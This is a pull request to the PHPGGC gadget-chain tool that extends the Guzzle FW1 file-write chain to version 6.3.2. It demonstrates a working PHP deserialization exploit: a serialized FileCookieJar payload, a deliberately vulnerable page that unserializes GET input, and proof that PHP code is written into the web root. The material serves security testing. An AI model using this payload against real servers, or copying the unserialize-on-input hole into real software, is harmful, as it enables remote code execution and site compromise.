### PR TITLE
Update Guzzle/FW/1 max supported version 6.3.2

### DIFF
--- a/gadgetchains/Guzzle/FW/1/chain.php
+++ b/gadgetchains/Guzzle/FW/1/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Guzzle;
 
 class FW1 extends \PHPGGC\GadgetChain\FileWrite
 {
-    public $version = '6.0.0 <= 6.3.0';
+    public $version = '6.0.0 <= 6.3.2';
     public $vector = '__destruct';
     public $author = 'cf';
 


### PR DESCRIPTION
Guzzle was updated to version 6.3.2 recently.

The file write gadget is still present. Reviewing the git log shows no major changes to the library code - mostly minor refactoring.

Tested with Guzzle 6.3.2 (installed with composer) on Ubuntu 16 `Apache/2.4.18 (Ubuntu)` `PHP 7.0.28-0ubuntu0.16.04.1`.

```bash
$ ./phpggc -s Guzzle/FW1 '/var/www/html/test.php' '/tmp/asdf'
O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:41:"%00GuzzleHttp\Cookie\FileCookieJar%00filename";s:22:"/var/www/html/test.php";s:52:"%00GuzzleHttp\Cookie\FileCookieJar%00storeSessionCookies";b:1;s:36:"%00GuzzleHttp\Cookie\CookieJar%00cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"%00GuzzleHttp\Cookie\SetCookie%00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:21:"<?php echo 'win';%0A?>%0A";}}}s:39:"%00GuzzleHttp\Cookie\CookieJar%00strictMode";N;}
```

```bash
$ cat /var/www/html/asdf.php 
<?php

require 'vendor/autoload.php';

unserialize($_GET['test']);

?>
```

```bash
http://127.0.0.1/asdf.php?test=O:31:%22GuzzleHttp\Cookie\FileCookieJar%22:4:{s:41:%22%00GuzzleHttp\Cookie\FileCookieJar%00filename%22;s:22:%22/var/www/html/test.php%22;s:52:%22%00GuzzleHttp\Cookie\FileCookieJar%00storeSessionCookies%22;b:1;s:36:%22%00GuzzleHttp\Cookie\CookieJar%00cookies%22;a:1:{i:0;O:27:%22GuzzleHttp\Cookie\SetCookie%22:1:{s:33:%22%00GuzzleHttp\Cookie\SetCookie%00data%22;a:3:{s:7:%22Expires%22;i:1;s:7:%22Discard%22;b:0;s:5:%22Value%22;s:21:%22%3C?php%20echo%20%27win%27;%20?%3E%0A%22;}}}s:39:%22%00GuzzleHttp\Cookie\CookieJar%00strictMode%22;N;}
```

```bash
$ cat /var/www/html/test.php 
[{"Expires":1,"Discard":false,"Value":"<?php echo 'win'; ?>\n"}]
```
